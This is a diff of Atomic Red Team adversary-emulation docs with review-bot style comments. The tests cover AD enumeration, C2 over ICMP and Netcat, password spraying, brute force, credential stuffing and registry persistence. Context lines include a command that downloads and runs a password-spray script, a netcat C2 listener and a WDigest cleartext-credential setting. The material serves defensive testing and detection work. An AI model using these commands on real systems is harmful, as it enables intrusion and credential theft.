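Review bot: style points in this hunk that recur in Tests #6 to #8 below: the heading "Adfind -Listing password policy" has no space after the hyphen, while the later headings use "Adfind - Enumerate ..."; "Active directory" should be "Active Directory"; and the "reference-" prefix before the URLs would read better as "Reference:" on its own line. Since all four descriptions share the same lead sentence, fix them together at the source.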
@@ -210,14 +220,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #6 - Adfind - Enumerate Active Directory Admins
auto_generated_guid: b95fd967-4e62-4109-b48d-265edfd28c3a
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
**Supported Platforms:** Windows
**auto_generated_guid:** b95fd967-4e62-4109-b48d-265edfd28c3a
#### Inputs:
@@ -254,14 +266,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #7 - Adfind - Enumerate Active Directory User Objects
auto_generated_guid: e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** e1ec8d20-509a-4b9a-b820-06c9b2da8eb7
#### Inputs:
@@ -298,14 +312,16 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #8 - Adfind - Enumerate Active Directory Exchange AD Objects
auto_generated_guid: 5e2938fb-f919-47b6-8b29-2f6a1f718e99
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** 5e2938fb-f919-47b6-8b29-2f6a1f718e99
#### Inputs:
@@ -342,13 +358,15 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste
<br/>
## Atomic Test #9 - Enumerate Default Domain Admin Details (Domain)
auto_generated_guid: c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
This test will enumerate the details of the built-in domain admin account
**Supported Platforms:** Windows
**auto_generated_guid:** c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef
@@ -368,16 +386,18 @@ net user administrator /domain
<br/>
## Atomic Test #10 - Enumerate Active Directory for Unconstrained Delegation
auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
**Supported Platforms:** Windows
**auto_generated_guid:** 46f8dbe9-22a5-4770-8513-66119c5be63b
#### Inputs:
+15 -9
@@ -16,15 +16,17 @@ By using a compromised internal system as a proxy, adversaries may conceal the t
<br/>
## Atomic Test #1 - Connection Proxy
auto_generated_guid: 0ac21132-4485-4212-a681-349e8a6637cd
Enable traffic redirection.
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 0ac21132-4485-4212-a681-349e8a6637cd
#### Inputs:
@@ -55,16 +57,18 @@ unset https_proxy
<br/>
## Atomic Test #2 - Connection Proxy for macOS UI
auto_generated_guid: 648d68c1-8bcd-4486-9abe-71c6655b6a2c
Enable traffic redirection on macOS UI (not terminal).
The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface.
Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS
**auto_generated_guid:** 648d68c1-8bcd-4486-9abe-71c6655b6a2c
#### Inputs:
@@ -97,15 +101,17 @@ networksetup -setsecurewebproxystate #{interface} off
<br/>
## Atomic Test #3 - portproxy reg key
auto_generated_guid: b8223ea9-4be2-44a6-b50a-9657a3d4e72a
Adds a registry key to set up a proxy on the endpoint at HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
Upon execution there will be a new proxy entry in netsh
netsh interface portproxy show all
**Supported Platforms:** Windows
**auto_generated_guid:** b8223ea9-4be2-44a6-b50a-9657a3d4e72a
#### Inputs:
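Review bot: formatting: the verification command `netsh interface portproxy show all` sits on its own line in the description with no code formatting, so it renders as a continuation of "Upon execution there will be a new proxy entry in netsh"; wrap it in backticks (the T1098 "Domain Account and Group Manipulate" description in this commit already uses backticks for its example command). The first description line is also missing its terminal period.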
+15 -9
@@ -17,14 +17,16 @@ ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Ev
<br/>
## Atomic Test #1 - ICMP C2
auto_generated_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc
This will attempt to start C2 Session Using ICMP. For information on how to set up the listener
refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-icmp/
**Supported Platforms:** Windows
**auto_generated_guid:** 0268e63c-e244-42db-bef7-72a9e59fc1fc
#### Inputs:
@@ -50,15 +52,17 @@ Invoke-PowerShellIcmp -IPAddress #{server_ip}
<br/>
## Atomic Test #2 - Netcat C2
auto_generated_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
Start C2 Session Using Ncat
To start the listener on a Linux device, type the following:
nc -l -p <port>
**Supported Platforms:** Windows
**auto_generated_guid:** bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37
#### Inputs:
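Review bot: the listener command `nc -l -p <port>` in this hunk's description is not code-formatted, and the bare angle brackets around `port` risk being dropped or treated as a tag by the Markdown/HTML renderer; wrap the command in backticks. The same line appears verbatim in the Test #3 "Powercat C2" description below, so fix both.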
@@ -106,15 +110,17 @@ if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\
<br/>
## Atomic Test #3 - Powercat C2
auto_generated_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
Start C2 Session Using Powercat
To start the listener on a Linux device, type the following:
nc -l -p <port>
**Supported Platforms:** Windows
**auto_generated_guid:** 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e
#### Inputs:
+5 -3
@@ -12,14 +12,16 @@ Adversaries may modify SSH <code>authorized_keys</code> files directly with scri
<br/>
## Atomic Test #1 - Modify SSH Authorized Keys
auto_generated_guid: 342cc723-127c-4d3a-8292-9c0c6b4ecadc
Modify contents of <user-home>/.ssh/authorized_keys to maintain persistence on victim host.
If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.
**Supported Platforms:** macOS, Linux
**auto_generated_guid:** 342cc723-127c-4d3a-8292-9c0c6b4ecadc
+10 -6
@@ -12,13 +12,15 @@
<br/>
## Atomic Test #1 - Admin Account Manipulate
auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af
Manipulate Admin Account Name
**Supported Platforms:** Windows
**auto_generated_guid:** 5598f7cb-cf43-455e-883a-f6008c5d46af
@@ -64,9 +66,6 @@ foreach($u in $list) {
<br/>
## Atomic Test #2 - Domain Account and Group Manipulate
auto_generated_guid: a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins).
The quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,
@@ -79,9 +78,14 @@ service account whose delegation is given onto a dedicated OU for user creation
as group manager of the target group.
Example: `Invoke-AtomicTest -Session $session 'T1098' -TestNames "Domain Account and Group Manipulate" -InputArgs @{"group" = "DNSAdmins" }`
**Supported Platforms:** Windows
**auto_generated_guid:** a55a22e9-a3d3-42ce-bd48-2653adb8f7a9
#### Inputs:
+70 -42
@@ -36,13 +36,15 @@
<br/>
## Atomic Test #1 - rsync remote file copy (push)
auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409
Utilize rsync to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0fc6e977-cb12-44f6-b263-2824ba917409
#### Inputs:
@@ -70,13 +72,15 @@ rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
<br/>
## Atomic Test #2 - rsync remote file copy (pull)
auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f
Utilize rsync to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 3180f7d5-52c0-4493-9ea0-e3431a84773f
#### Inputs:
@@ -104,13 +108,15 @@ rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
<br/>
## Atomic Test #3 - scp remote file copy (push)
auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344
Utilize scp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 83a49600-222b-4866-80a0-37736ad29344
#### Inputs:
@@ -138,13 +144,15 @@ scp #{local_file} #{username}@#{remote_host}:#{remote_path}
<br/>
## Atomic Test #4 - scp remote file copy (pull)
auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33
Utilize scp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33
#### Inputs:
@@ -172,13 +180,15 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
<br/>
## Atomic Test #5 - sftp remote file copy (push)
auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e
Utilize sftp to perform a remote file copy (push)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e
#### Inputs:
@@ -206,13 +216,15 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
<br/>
## Atomic Test #6 - sftp remote file copy (pull)
auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef
Utilize sftp to perform a remote file copy (pull)
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef
#### Inputs:
@@ -240,13 +252,15 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
<br/>
## Atomic Test #7 - certutil download (urlcache)
auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works!
**Supported Platforms:** Windows
**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0
#### Inputs:
@@ -276,13 +290,15 @@ del #{local_path} >nul 2>&1
<br/>
## Atomic Test #8 - certutil download (verifyctl)
auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b
Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works!
**Supported Platforms:** Windows
**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b
#### Inputs:
@@ -316,14 +332,16 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
<br/>
## Atomic Test #9 - Windows - BITSAdmin BITS Download
auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
This test uses BITSAdmin.exe to schedule a BITS job for the download of a file.
This technique is used by Qbot malware to download payloads.
**Supported Platforms:** Windows
**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b
#### Inputs:
@@ -350,14 +368,16 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
<br/>
## Atomic Test #10 - Windows - PowerShell Download
auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
This test uses PowerShell to download a payload.
This technique is used by multiple adversaries and malware families.
**Supported Platforms:** Windows
**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8
#### Inputs:
@@ -387,13 +407,15 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
<br/>
## Atomic Test #11 - OSTAP Worming Activity
auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad
OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity.
**Supported Platforms:** Windows
**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad
#### Inputs:
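Review bot: "specfic" in this hunk's description should be "specific", and the malware name is spelled "OSTAP" in the heading but "OSTap" in the description; pick one spelling for both.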
@@ -423,14 +445,16 @@ popd
<br/>
## Atomic Test #12 - svchost writing a file to a UNC path
auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f
svchost.exe writing a non-Microsoft Office file to a file with a UNC path.
Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file.
**Supported Platforms:** Windows
**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f
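Review bot: the description in this hunk never says where the UNC path comes in: the first line ("svchost.exe writing a non-Microsoft Office file to a file with a UNC path") is a fragment, and the second line only mentions renaming cmd.exe, moving it to `c:\` and writing "output to a txt file". Since the UNC destination is the point of the test (it is in the heading), state in the description that the txt file is written to a UNC path, and rephrase the first line as a sentence, e.g. "svchost.exe writes a non-Microsoft Office file to a UNC path."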
@@ -456,17 +480,19 @@ del C:\\svchost.exe >nul 2>&1
<br/>
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe
auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed).
The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file.
By default, the test downloads the Atomic Red Team license file to the temp directory.
More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
**Supported Platforms:** Windows
**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc
#### Inputs:
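Review bot: minor wording in this hunk's description: "Uses the Windows Defender to download" should be "Uses Windows Defender to download", and "can be found here https://lolbas-project.github.io/..." needs a colon or period before the URL so the link is set off from the sentence.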
@@ -514,13 +540,15 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
<br/>
## Atomic Test #14 - whois file download
auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
Download a remote file using the whois utility
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab
#### Inputs:
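Review bot: the `Write-Host "Windows Defender verion 4.18.2007.8-0, ..."` message visible in this hunk's header context misspells "version"; that string is user-facing output of the previous test (MpCmdRun.exe download), so it is worth fixing in the test command even though this hunk only touches the whois test below it.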
+5 -3
@@ -16,13 +16,15 @@ Adversaries may abuse these native API functions as a means of executing behavio
<br/>
## Atomic Test #1 - Execution through API - CreateProcess
auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62
Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt.
**Supported Platforms:** Windows
**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62
#### Inputs:
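Review bot: "Win32 API's" in this hunk's description should be "Win32 APIs" (plural, not possessive).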
+10 -6
@@ -33,13 +33,15 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
<br/>
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB
auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224
Creates username and password files then attempts to brute force on remote host
**Supported Platforms:** Windows
**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224
#### Inputs:
@@ -71,13 +73,15 @@ echo "Password!" >> #{input_file_passwords}
<br/>
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos
**Supported Platforms:** Windows
**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250
#### Inputs:
+5 -3
@@ -10,13 +10,15 @@
<br/>
## Atomic Test #1 - Password Cracking with Hashcat
auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692
Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
**Supported Platforms:** Windows
**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692
#### Inputs:
+15 -9
@@ -33,16 +33,18 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
<br/>
## Atomic Test #1 - Password Spray all Domain Users
auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
**Supported Platforms:** Windows
**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175
#### Inputs:
@@ -79,15 +81,17 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
<br/>
## Atomic Test #2 - Password Spray (DomainPasswordSpray)
auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b
Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
https://github.com/dafthack/DomainPasswordSpray
**Supported Platforms:** Windows
**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b
#### Inputs:
@@ -113,15 +117,17 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
<br/>
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
**Supported Platforms:** Windows
**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d
#### Inputs:
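Review bot: "brute force all domain user with a single password" in this hunk's description should be "all domain users"; the sentence is also missing its terminal period before the "Prerequisite:" line.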
+10 -6
@@ -31,13 +31,15 @@ In addition to management services, adversaries may "target single sign-on (SSO)
<br/>
## Atomic Test #1 - SSH Credential Stuffing From Linux
auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad
Using username,password combination from a password dump to login over SSH.
**Supported Platforms:** Linux
**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad
#### Inputs:
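Review bot: the description "Using username,password combination from a password dump to login over SSH." is a fragment with a missing space after the comma; suggest "Use a username/password combination from a password dump to log in over SSH." The identical line appears in Test #2 ("SSH Credential Stuffing From MacOS") below, so fix both.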
@@ -75,13 +77,15 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
<br/>
## Atomic Test #2 - SSH Credential Stuffing From MacOS
auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
Using username,password combination from a password dump to login over SSH.
**Supported Platforms:** macOS
**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
#### Inputs:
+30 -18
@@ -26,14 +26,16 @@ The Registry of a remote system may be modified to aid in execution of files as
<br/>
## Atomic Test #1 - Modify Registry of Current User Profile - cmd
auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
**Supported Platforms:** Windows
**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
@@ -57,15 +59,17 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
<br/>
## Atomic Test #2 - Modify Registry of Local Machine - cmd
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
**Supported Platforms:** Windows
**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe
#### Inputs:
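Review bot: the description points readers at the wrong hive. It says "open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run", but the test title is "Modify Registry of Local Machine" and the cleanup shown in the next hunk header runs `reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run`, so the path should be HKLM\Software\Microsoft\Windows\CurrentVersion\Run. While editing, "should be ran" and "CMD is ran" should read "should be run" and "CMD is run".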
@@ -94,15 +98,17 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
<br/>
## Atomic Test #3 - Modify registry to store logon credentials
auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
**Supported Platforms:** Windows
**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
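Review bot: the description "Sets registry key that will tell windows to store plaintext passwords" can be read as the registry itself storing passwords. The value touched in the next hunk header, `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential`, makes the WDigest provider keep logon credentials in LSASS memory in cleartext; suggest wording such as "Sets the WDigest UseLogonCredential registry value so that Windows keeps plaintext logon credentials in LSASS memory, which credential dumping tools can then read." Capitalise "Windows" as well.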
@@ -126,17 +132,19 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
<br/>
## Atomic Test #4 - Add domain to Trusted sites Zone
auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
**Supported Platforms:** Windows
**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57
#### Inputs:
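Review bot: the bare URL on the line "https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf" should be labelled, for example as a "Reference:" line or a markdown link, so the generated page explains what the link supports (it is the source for the "c2 over office365" claim). Also "c2 over office365" should read "C2 over Office 365" for consistency with the rest of the docs.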
@@ -171,14 +179,16 @@ Remove-item $key -Recurse -ErrorAction Ignore
<br/>
## Atomic Test #5 - Javascript in registry
auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
**Supported Platforms:** Windows
**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae
@@ -202,14 +212,16 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
<br/>
## Atomic Test #6 - Change Powershell Execution Policy to Bypass
auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245
Attackers need to change the powershell execution policy in order to run their malicious powershell scripts.
They can either specify it during the execution of the powershell script or change the registry value for it.
**Supported Platforms:** Windows
**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245
#### Inputs:
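Review bot: "Attackers need to change the powershell execution policy in order to run their malicious powershell scripts" overstates the control. Execution policy is not a security boundary, and the second sentence of the same description already says it can be supplied at invocation time, so "need to" should become "may" or "often"; a defender reading this should understand that a registry change to the policy is an indicator, not a prerequisite for script execution. Capitalise "PowerShell" in both sentences.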
+25 -15
View File
@@ -19,13 +19,15 @@
<br/>
## Atomic Test #1 - Screencapture
auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac
#### Inputs:
@@ -54,13 +56,15 @@ rm #{output_file}
<br/>
## Atomic Test #2 - Screencapture (silent)
auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
Use screencapture command to collect a full desktop screenshot
**Supported Platforms:** macOS
**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4
#### Inputs:
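Review bot: the description for "Screencapture (silent)" is word-for-word the same as Test #1, "Use screencapture command to collect a full desktop screenshot". The doc should state what makes this variant silent (which screencapture option suppresses the shutter sound or on-screen notification) so that the two tests are distinguishable to someone building detections around user-visible versus user-invisible capture.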
@@ -89,13 +93,15 @@ rm #{output_file}
<br/>
## Atomic Test #3 - X Windows Capture
auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
Use xwd command to collect a full desktop screenshot and review file with xwud
**Supported Platforms:** Linux
**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac
#### Inputs:
@@ -139,13 +145,15 @@ sudo #{package_installer}
<br/>
## Atomic Test #4 - Capture Linux Desktop using Import Tool
auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1
Use import command from ImageMagick to collect a full desktop screenshot
**Supported Platforms:** Linux
**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1
#### Inputs:
@@ -186,13 +194,15 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
<br/>
## Atomic Test #5 - Windows Screencapture
auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153
Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour
**Supported Platforms:** Windows
**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153
#### Inputs:
+5 -3
View File
@@ -12,16 +12,18 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
<br/>
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox
auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb
Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file.
Note: Outlook is required, but no email account necessary to produce artifacts.
**Supported Platforms:** Windows
**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb
#### Inputs:
+20 -12
View File
@@ -18,13 +18,15 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
<br/>
## Atomic Test #1 - Utilize Clipboard to store or execute commands from
auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
Add data to clipboard to copy off or execute commands from.
**Supported Platforms:** Windows
**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7
@@ -50,13 +52,15 @@ del %temp%\T1115.txt >nul 2>&1
<br/>
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell
auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
Utilize PowerShell to echo a command to clipboard and execute it
**Supported Platforms:** Windows
**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416
@@ -77,13 +81,15 @@ Get-Clipboard | iex
<br/>
## Atomic Test #3 - Execute commands from clipboard
auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
Echo a command to clipboard and execute it
**Supported Platforms:** macOS
**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
@@ -104,13 +110,15 @@ $(pbpaste)
<br/>
## Atomic Test #4 - Collect Clipboard Data via VBA
auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt
**Supported Platforms:** Windows
**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52
#### Inputs:
+20 -12
View File
@@ -18,14 +18,16 @@ This technique may incorporate use of other techniques such as [File and Directo
<br/>
## Atomic Test #1 - Automated Collection Command Prompt
auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b
@@ -51,14 +53,16 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
<br/>
## Atomic Test #2 - Automated Collection PowerShell
auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
to see what was collected.
**Supported Platforms:** Windows
**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313
